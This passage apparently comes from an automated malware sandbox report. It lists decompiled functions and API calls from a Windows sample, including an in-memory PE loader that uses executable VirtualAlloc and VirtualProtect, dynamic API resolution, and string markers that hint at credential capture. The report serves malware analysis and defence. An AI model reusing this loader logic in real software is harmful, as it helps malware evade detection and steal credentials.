    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,10082C5D,?,00000001,?,?,00000001,?,?,00000001,?,1009E360,0000000C), ref: 100825E2
    • CoInitialize.OLE32(00000000), ref: 100825EF
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01332200, Relevance: 2.6, APIs: 2, Instructions: 70
    C-Code - Quality: 96%
    			E01332200(intOrPtr __ecx) {
				intOrPtr _v8;
				signed int _t16;
				void* _t19;
				void* _t22;
				intOrPtr _t25;
				intOrPtr _t28;
				signed int _t31;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t40;
				void* _t44;
				long _t45;

				_push(__ecx);
				_t28 = __ecx;
				_t40 = 0;
				_v8 = __ecx;
				_t16 =  *(__ecx + 0x46) & 0x0000ffff;
				_t44 = 0;
				_t33 =  *((intOrPtr*)(__ecx + 0x138));
				if(0 < _t16) {
					_t36 = _t33 + 0xc;
					_t31 = _t16;
					do {
						_t38 =  *((intOrPtr*)(_t36 - 4));
						if(_t38 != 0) {
							_t25 =  *_t36;
							_t40 =  <  ? _t25 : _t40;
							_t44 =  >  ? _t25 + _t38 : _t44;
						}
						_t36 = _t36 + 0x28;
						_t31 = _t31 - 1;
					} while (_t31 != 0);
					_t28 = _v8;
				}
				_t45 = _t44 - _t40;
				_t19 = VirtualAlloc( *((intOrPtr*)(_t28 + 0x74)) + _t40, _t45, 0x3000, 0x40); // executed
				 *(_t28 + 0x148) = _t19;
				 *((intOrPtr*)(_t28 + 0x144)) =  *((intOrPtr*)(_t28 + 0x74));
				if(_t19 != 0) {
					L10:
					_t21 =  ==  ? 3 : 0;
					return  ==  ? 3 : 0;
				} else {
					if(( *(_t28 + 0x56) & 0x00000001) == 0) {
						_t22 = VirtualAlloc(0, _t45, 0x3000, 0x40);
						 *(_t28 + 0x148) = _t22;
						 *((intOrPtr*)(_t28 + 0x144)) = _t22 - _t40;
						goto L10;
					} else {
						return 4;
					}
				}
			}
















    0x01332203
    0x01332205
    0x0133220b
    0x0133220d
    0x01332210
    0x01332214
    0x01332216
    0x0133221f
    0x01332221
    0x01332224
    0x01332226
    0x01332226
    0x0133222b
    0x0133222d
    0x01332231
    0x01332238
    0x01332238
    0x0133223b
    0x0133223e
    0x0133223e
    0x01332243
    0x01332243
    0x01332249
    0x01332256
    0x0133225f
    0x01332265
    0x0133226d
    0x0133229f
    0x013322ae
    0x013322b5
    0x0133226f
    0x01332273
    0x0133228b
    0x01332291
    0x01332299
    0x00000000
    0x01332275
    0x01332280
    0x01332280
    0x01332273

    APIs
    • VirtualAlloc.KERNELBASE(?,00000000,00003000,00000040), ref: 01332256
    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040), ref: 0133228B
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100017DF, Relevance: 2.6, APIs: 2, Instructions: 70
    APIs
      • Part of subcall function 10001700: lstrlenA.KERNEL32 ref: 10001725
      • Part of subcall function 10001700: HeapAlloc.KERNEL32(00000008,?), ref: 1000176D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTCRED>,00000000,00000000,00000000,?), ref: 10001021
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<STARTPASS>,00000000), ref: 1000104D
      • Part of subcall function 10001000: lstrlenW.KERNEL32(<ENDCRED>,00000000), ref: 10001075
      • Part of subcall function 10001000: lstrlenW.KERNEL32(10094C54), ref: 10001093
    • HeapFree.KERNEL32(00000000,00000000), ref: 10001870
    • HeapFree.KERNEL32(00000000,00000000), ref: 1000187B
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01333F89, Relevance: 1.6, APIs: 1, Instructions: 101
    C-Code - Quality: 72%
    			E01333F89(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, void* __esi) {
				void* _t10;
				intOrPtr _t12;
				void* _t20;
				void* _t27;
				void* _t29;
				void* _t31;
				char _t35;
				void* _t36;
				intOrPtr* _t40;
				void* _t44;
				intOrPtr* _t51;
				intOrPtr* _t52;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;

				_t48 = __edi;
				_t47 = __edx;
				_t36 = __ecx;
				E013348B0(__ebx, __edi, __esi, 0x1345af0, 0x14);
				_t10 = E0133439D(_t36, __edx, 1); // executed
				if(_t10 != 0) {
					L2:
					_t35 = 0;
					 *((char*)(_t55 - 0x19)) = 0;
					 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
					 *((char*)(_t55 - 0x24)) = E01334368();
					_t12 =  *0x1347b94; // 0x2
					if(_t12 == 1) {
						goto L1;
					}
					if(_t12 != 0) {
						_t35 = 1;
						 *((char*)(_t55 - 0x19)) = 1;
						L8:
						E013344F7( *((intOrPtr*)(_t55 - 0x24)));
						_pop(_t40);
						_t51 = E01334697();
						if( *_t51 != 0) {
							_t29 = E0133446D(_t35, 0, _t51);
							_t40 = _t51;
							if(_t29 != 0) {
								_t54 =  *_t51;
								_t40 = _t54;
								L0133489C();
								 *_t54(0, 2, 0);
							}
						}
						_t52 = E0133469D();
						if( *_t52 != 0) {
							_t27 = E0133446D(_t35, 0, _t52);
							_t40 = _t52;
							if(_t27 != 0) {
								E0133808B(_t35, _t47, 0, _t52,  *_t52);
								_pop(_t40);
							}
						}
						_push(E013347BE() & 0x0000ffff);
						_push(E01337D27());
						_push(0);
						_push(0x1330000); // executed
						_t20 = E013338C0(); // executed
						_t53 = _t20;
						if(E01337F9A() == 0) {
							E013380C3(_t53); // executed
						}
						if(_t35 == 0) {
							E01338066();
						}
						E01334514(_t40, 1, 0);
						 *(_t55 - 4) = 0xfffffffe;
						L19:
						return E013348F6();
					}
					 *0x1347b94 = 1;
					_t31 = E01337DC9(1, 0x1340150, 0x1340168); // executed
					_pop(_t44);
					if(_t31 == 0) {
						E01337D6D(_t44, 0x1340144, 0x134014c); // executed
						 *0x1347b94 = 2;
						goto L8;
					} else {
						 *(_t55 - 4) = 0xfffffffe;
						goto L19;
					}
				}
				L1:
				E013346A3(_t47, _t48, 7);
				goto L2;
			}


















    0x01333f89
    0x01333f89
    0x01333f89
    0x01333f90
    0x01333f97
    0x01333f9f
    0x01333fa8
    0x01333fa8
    0x01333faa
    0x01333fad
    0x01333fb6
    0x01333fb9
    0x01333fc3
    0x00000000
    0x00000000
    0x01333fc7
    0x01334012
    0x01334014
    0x01334017
    0x0133401a
    0x0133401f
    0x01334025
    0x0133402b
    0x0133402e
    0x01334033
    0x01334036
    0x0133403c
    0x0133403e
    0x01334040
    0x01334045
    0x01334045
    0x01334036
    0x0133404c
    0x01334050
    0x01334053
    0x01334058
    0x0133405b
    0x0133405f
    0x01334064
    0x01334064
    0x0133405b
    0x0133406d
    0x01334073
    0x01334074
    0x01334075
    0x0133407a
    0x0133407f
    0x01334088
    0x0133408b
    0x0133408b
    0x01334092
    0x01334094
    0x01334094
    0x0133409c
    0x013340a3
    0x013340eb
    0x013340f0
    0x013340f0
    0x01333fc9
    0x01333fd9
    0x01333fdf
    0x01333fe2
    0x01333fff
    0x01334006
    0x00000000
    0x01333fe4
    0x01333fe4
    0x00000000
    0x01333feb
    0x01333fe2
    0x01333fa1
    0x01333fa3
    0x00000000

    APIs
      • Part of subcall function 013346A3: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 013346B0
      • Part of subcall function 013346A3: IsDebuggerPresent.KERNEL32(?,?,?,00000017,?), ref: 01334778
      • Part of subcall function 013346A3: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01334797
      • Part of subcall function 013346A3: UnhandledExceptionFilter.KERNEL32(?), ref: 013347A1
    • ___scrt_get_show_window_mode.LIBCMT ref: 01334065
      • Part of subcall function 013347BE: GetStartupInfoW.KERNEL32(?), ref: 013347D8
      • Part of subcall function 013338C0: GetCommandLineW.KERNEL32 ref: 013338DF
      • Part of subcall function 013338C0: CommandLineToArgvW.SHELL32(00000000,00000000), ref: 013338F3
      • Part of subcall function 013338C0: CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000003,00000000,00000000), ref: 01333A36
      • Part of subcall function 013338C0: WriteFile.KERNEL32(00000000,<NULL>,?,?,00000000), ref: 01333A74
      • Part of subcall function 013338C0: CloseHandle.KERNEL32(00000000), ref: 01333A7B
      • Part of subcall function 01337F9A: GetModuleHandleW.KERNEL32(00000000,01337E58,01345DD0,0000000C,01338086,00000003,00000002,00000000,?,013388CE,00000003,0133959B,?,?,00000000,00000000), ref: 01337F9C
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10011D60, Relevance: 1.6, APIs: 1, Instructions: 95
    APIs
      • Part of subcall function 1000DCD0: __alldiv.INT64 ref: 1000DD28
    • __alldiv.INT64 ref: 10011E60
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 01336A96, Relevance: 1.6, APIs: 1, Instructions: 66library
    C-Code - Quality: 88%
    			E01336A96(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t34;
				intOrPtr* _t35;

				_t20 = 0x1347c34 + _a4 * 4;
				asm("lock cmpxchg [ebx], ecx");
				_t28 =  *0x1347004; // 0x262637d3
				_t30 = _t29 | 0xffffffff;
				_t34 = _t28 ^ 0;
				asm("ror esi, cl");
				if(_t34 == _t30) {
					L14:
					return 0;
				}
				if(_t34 == 0) {
					_t35 = _a12;
					if(_t35 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t30 ^ _t28;
							goto L14;
						}
						_t34 = GetProcAddress(_t13, _a8);
						if(_t34 == 0) {
							_t28 =  *0x1347004; // 0x262637d3
							goto L13;
						}
						 *_t20 = E01336A79(_t34);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E01336B36( *_t35); // executed
						if(_t13 != 0) {
							break;
						}
						_t35 = _t35 + 4;
						if(_t35 != _a16) {
							continue;
						}
						_t28 =  *0x1347004; // 0x262637d3
						goto L7;
					}
					_t28 =  *0x1347004; // 0x262637d3
					goto L8;
				}
				L2:
				return _t34;
			}










    0x01336aa1
    0x01336aaa
    0x01336aae
    0x01336ab4
    0x01336abe
    0x01336ac0
    0x01336ac4
    0x01336b2f
    0x00000000
    0x01336b2f
    0x01336ac8
    0x01336ace
    0x01336ad4
    0x01336af0
    0x01336af0
    0x01336af2
    0x01336af4
    0x01336b1f
    0x01336b21
    0x01336b29
    0x01336b2d
    0x00000000
    0x01336b2d
    0x01336b00
    0x01336b04
    0x01336b19
    0x00000000
    0x01336b19
    0x01336b0d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x01336ad6
    0x01336ad6
    0x01336ad8
    0x01336ae0
    0x00000000
    0x00000000
    0x01336ae2
    0x01336ae8
    0x00000000
    0x00000000
    0x01336aea
    0x00000000
    0x01336aea
    0x01336b11
    0x00000000
    0x01336b11
    0x01336aca
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24,01347C08,00000FA0), ref: 01336AFA
      • Part of subcall function 01336B36: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,01347C08,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx), ref: 01336B6E
      • Part of subcall function 01336B36: GetLastError.KERNEL32(?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000,?,01336A24), ref: 01336B7A
      • Part of subcall function 01336B36: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx), ref: 01336B88
      • Part of subcall function 01336B36: FreeLibrary.KERNEL32(00000000,?,?,01336ADD,?,01347C08,00000000,?,?,01336CBC,00000008,InitializeCriticalSectionEx,01340360,InitializeCriticalSectionEx,00000000), ref: 01336BAA
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100842C6, Relevance: 1.6, APIs: 1, Instructions: 66library
    APIs
    • GetProcAddress.KERNEL32(00000000,00000001,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076,00000005,10083F29), ref: 1008432A
      • Part of subcall function 10084366: LoadLibraryExW.KERNELBASE(?,00000000,00000800,?,00000001,?,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree), ref: 1008439E
      • Part of subcall function 10084366: GetLastError.KERNEL32(?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076,00000005), ref: 100843AA
      • Part of subcall function 10084366: LoadLibraryExW.KERNEL32(?,00000000,00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000), ref: 100843B8
      • Part of subcall function 10084366: FreeLibrary.KERNEL32(00000000,?,1008430D,?,00000001,00000000,?,?,1008443B,00000005,FlsFree,1009041C,FlsFree,00000000,?,10084076), ref: 100843DA
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133A66E, Relevance: 1.6, APIs: 1, Instructions: 65library
    C-Code - Quality: 90%
    			E0133A66E(signed int _a4, CHAR* _a8, intOrPtr* _a12, intOrPtr _a16) {
				struct HINSTANCE__* _t13;
				signed int* _t20;
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t33;
				intOrPtr* _t34;

				_t20 = 0x13482d0 + _a4 * 4;
				_t27 =  *0x1347004; // 0x262637d3
				_t29 = _t28 | 0xffffffff;
				_t33 = _t27 ^  *_t20;
				asm("ror esi, cl");
				if(_t33 == _t29) {
					L14:
					return 0;
				}
				if(_t33 == 0) {
					_t34 = _a12;
					if(_t34 == _a16) {
						L7:
						_t13 = 0;
						L8:
						if(_t13 == 0) {
							L13:
							_push(0x20);
							asm("ror edi, cl");
							 *_t20 = _t29 ^ _t27;
							goto L14;
						}
						_t33 = GetProcAddress(_t13, _a8);
						if(_t33 == 0) {
							_t27 =  *0x1347004; // 0x262637d3
							goto L13;
						}
						 *_t20 = E01336A79(_t33);
						goto L2;
					} else {
						goto L4;
					}
					while(1) {
						L4:
						_t13 = E0133A70A( *_t34); // executed
						if(_t13 != 0) {
							break;
						}
						_t34 = _t34 + 4;
						if(_t34 != _a16) {
							continue;
						}
						_t27 =  *0x1347004; // 0x262637d3
						goto L7;
					}
					_t27 =  *0x1347004; // 0x262637d3
					goto L8;
				}
				L2:
				return _t33;
			}










    0x0133a679
    0x0133a682
    0x0133a688
    0x0133a692
    0x0133a694
    0x0133a698
    0x0133a703
    0x00000000
    0x0133a703
    0x0133a69c
    0x0133a6a2
    0x0133a6a8
    0x0133a6c4
    0x0133a6c4
    0x0133a6c6
    0x0133a6c8
    0x0133a6f3
    0x0133a6f5
    0x0133a6fd
    0x0133a701
    0x00000000
    0x0133a701
    0x0133a6d4
    0x0133a6d8
    0x0133a6ed
    0x00000000
    0x0133a6ed
    0x0133a6e1
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0133a6aa
    0x0133a6aa
    0x0133a6ac
    0x0133a6b4
    0x00000000
    0x00000000
    0x0133a6b6
    0x0133a6bc
    0x00000000
    0x00000000
    0x0133a6be
    0x00000000
    0x0133a6be
    0x0133a6e5
    0x00000000
    0x0133a6e5
    0x0133a69e
    0x00000000

    APIs
    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA,00000000), ref: 0133A6CE
      • Part of subcall function 0133A70A: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue), ref: 0133A73C
      • Part of subcall function 0133A70A: GetLastError.KERNEL32(?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364,?,013395EA), ref: 0133A748
      • Part of subcall function 0133A70A: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000), ref: 0133A756
      • Part of subcall function 0133A70A: FreeLibrary.KERNEL32(00000000,?,0133A6B1,00000000,00000000,00000000,00000000,?,0133A8AE,00000006,FlsSetValue,01341750,01341758,00000000,00000364), ref: 0133A778
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10086D1C, Relevance: 1.6, APIs: 1, Instructions: 65library
    APIs
    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85,00000000), ref: 10086D7C
      • Part of subcall function 10086DB8: LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,10084CC8,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue), ref: 10086DEA
      • Part of subcall function 10086DB8: GetLastError.KERNEL32(?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364,?,10086C85), ref: 10086DF6
      • Part of subcall function 10086DB8: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000), ref: 10086E04
      • Part of subcall function 10086DB8: FreeLibrary.KERNEL32(00000000,?,10086D5F,10084CC8,00000000,00000000,00000000,?,10086FD0,00000006,FlsSetValue,10091338,10091340,00000000,00000364), ref: 10086E26
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 1000DCD0, Relevance: 1.6, APIs: 1, Instructions: 64
    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 013326A0, Relevance: 1.6, APIs: 1, Instructions: 56
    C-Code - Quality: 96%
    			E013326A0(void* __ecx) {
				long _v8;
				signed int _t15;
				signed int _t17;
				long _t18;
				int _t21;
				void* _t26;
				void* _t32;
				intOrPtr _t36;
				unsigned int* _t38;

				_push(__ecx);
				_t26 = __ecx;
				_t32 = 0;
				_t36 =  *((intOrPtr*)(__ecx + 0x138));
				if(0 >=  *((intOrPtr*)(__ecx + 0x46))) {
					L13:
					return 0;
				} else {
					_t38 = _t36 + 0x24;
					do {
						_t15 =  *_t38;
						if((_t15 & 0x00000020) != 0) {
							 *_t38 = _t15 | 0x60000000;
						}
						_t17 =  *_t38 >> 0x1d;
						if(_t17 > 6) {
							L10:
							_t18 = 0x40;
						} else {
							switch( *((intOrPtr*)(_t17 * 4 +  &M01332740))) {
								case 0:
									goto L11;
								case 1:
									_t18 = 0x10;
									goto L11;
								case 2:
									goto L11;
								case 3:
									goto L11;
								case 4:
									goto L10;
							}
						}
						L11:
						_v8 = _t18;
						_t21 = VirtualProtect( *((intOrPtr*)(_t38 - 0x18)) +  *((intOrPtr*)(_t26 + 0x144)),  *(_t38 - 0x1c), _t18,  &_v8); // executed
						if(_t21 == 0) {
							return 9;
						} else {
							goto L12;
						}
						goto L15;
						L12:
						_t32 = _t32 + 1;
						_t38 =  &(_t38[0xa]);
					} while (_t32 < ( *(_t26 + 0x46) & 0x0000ffff));
					goto L13;
				}
				L15:
			}












    0x013326a3
    0x013326a5
    0x013326ab
    0x013326ad
    0x013326b7
    0x0133272a
    0x01332732
    0x013326b9
    0x013326b9
    0x013326c0
    0x013326c0
    0x013326c4
    0x013326cb
    0x013326cb
    0x013326cf
    0x013326d5
    0x013326fa
    0x013326fa
    0x013326d7
    0x013326d7
    0x00000000
    0x00000000
    0x00000000
    0x013326de
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x013326d7
    0x013326ff
    0x01332702
    0x01332714
    0x0133271c
    0x0133273e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0133271e
    0x01332722
    0x01332723
    0x01332726
    0x00000000
    0x013326c0
    0x00000000

    APIs
    • VirtualProtect.KERNELBASE(?,?,00000002,?), ref: 01332714
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 013388CF, Relevance: 1.5, APIs: 1, Instructions: 39
    C-Code - Quality: 95%
    			E013388CF(void* __ecx, signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x1348360, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E013381D5();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E013389A5())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E01337519(_t15, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}









    0x013388cf
    0x013388d5
    0x013388da
    0x013388e8
    0x013388e8
    0x013388ee
    0x013388f0
    0x013388f0
    0x01338907
    0x01338910
    0x01338918
    0x00000000
    0x00000000
    0x013388f8
    0x013388fa
    0x0133891c
    0x01338921
    0x01338927
    0x00000000
    0x01338927
    0x013388fd
    0x01338902
    0x01338903
    0x01338905
    0x00000000
    0x00000000
    0x01338905
    0x00000000
    0x01338907
    0x013388e0
    0x013388e6
    0x00000000
    0x00000000
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,013395CD,00000001,00000364,?,?,01332133,?), ref: 01338910
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 100864DA, Relevance: 1.5, APIs: 1, Instructions: 39
    APIs
    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,10086BE1,00000001,00000364,?,10084CC8,1008215D,00000000,?,?,?,1008215D,00000000), ref: 1008651B
    Memory Dump Source
    • Source File: 00000002.00000002.1560994638.10001000.00000020.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000002.00000002.1560988347.10000000.00000040.sdmp
    • Associated: 00000002.00000002.1561119037.10090000.00000002.sdmp
    • Associated: 00000002.00000002.1561138043.100A0000.00000004.sdmp
    • Associated: 00000002.00000002.1561146545.100A3000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_10000000_yegus.jbxd
    Function 0133883E, Relevance: 1.5, APIs: 1, Instructions: 32
    C-Code - Quality: 94%
    			E0133883E(void* __ecx, long _a4) {
				void* _t4;
				void* _t6;
				void* _t7;
				long _t8;

				_t7 = __ecx;
				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E013389A5())) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x1348360, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E013381D5();
					if(__eflags == 0) {
						goto L7;
					}
					_t6 = E01337519(_t7, __eflags, _t8);
					_pop(_t7);
					__eflags = _t6;
					if(_t6 == 0) {
						goto L7;
					}
				}
				return _t4;
			}







    0x0133883e
    0x01338844
    0x0133884a
    0x0133887c
    0x01338881
    0x01338887
    0x00000000
    0x01338887
    0x0133884e
    0x01338850
    0x01338850
    0x01338867
    0x01338870
    0x01338878
    0x00000000
    0x00000000
    0x01338858
    0x0133885a
    0x00000000
    0x00000000
    0x0133885d
    0x01338862
    0x01338863
    0x01338865
    0x00000000
    0x00000000
    0x01338865
    0x00000000

    APIs
    • RtlAllocateHeap.NTDLL(00000000,01332133,?,?,01332133,?), ref: 01338870
    Memory Dump Source
    • Source File: 00000002.00000002.1556466842.01331000.00000020.sdmp, Offset: 01330000, based on PE: true
    • Associated: 00000002.00000002.1556452083.01330000.00000002.sdmp
    • Associated: 00000002.00000002.1556498423.01340000.00000002.sdmp
    • Associated: 00000002.00000002.1556522255.01347000.00000004.sdmp
    • Associated: 00000002.00000002.1556531618.01349000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_1330000_yegus.jbxd
    Function 10086449, Relevance: 1.5, APIs: 1, Instructions: 32
    APIs
